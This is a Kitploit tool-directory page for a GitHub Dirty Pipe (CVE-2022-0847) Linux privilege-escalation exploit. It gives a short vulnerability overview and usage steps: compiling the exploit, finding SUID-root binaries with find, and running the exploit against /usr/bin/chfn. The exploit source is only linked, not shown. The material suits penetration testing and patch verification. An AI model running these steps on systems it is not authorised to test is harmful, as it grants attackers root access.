Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-0847-DirtyPipe-Exploit — CVE-2022-0847-DirtyPipe-Exploit | Kitploit
Tools/GitHubGitHub/v0wkeep3r/cve-2022-0847-dirtypipe-exploit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubv0wkeep3r/cve-2022-0847-dirtypipe-exploit

CVE-2022-0847-DirtyPipe-Exploit

CVE-2022-0847-DirtyPipe-Exploit

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
24 years agoNot yet reviewed

CVE-2022-0847-DirtyPipe

Vulnerability Overview

On March 7, foreign security researcher Max Kellermann published a blog disclosing a local privilege escalation vulnerability CVE-2022-0847 in the Linux kernel: https://dirtypipe.cm4all.com/

CVE-2022-0847 is a local privilege escalation vulnerability present in Linux kernel 5.8 and later versions. By exploiting this vulnerability, attackers can overwrite data in any readable file, thereby elevating a regular user to root privileges.

The vulnerability principle of CVE-2022-0847 is similar to CVE-2016-5195 Dirty Cow, but it is easier to exploit. The author of the vulnerability named it "Dirty Pipe".

EXP Usage

Link: https://haxx.in/files/dirtypipez.c
Author: Max Kellermann [email protected]

root@kitploit:~
gcc -o exp exploit.c
./exp +x ./exp

# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

./exp /usr/bin/chfn

Download Tool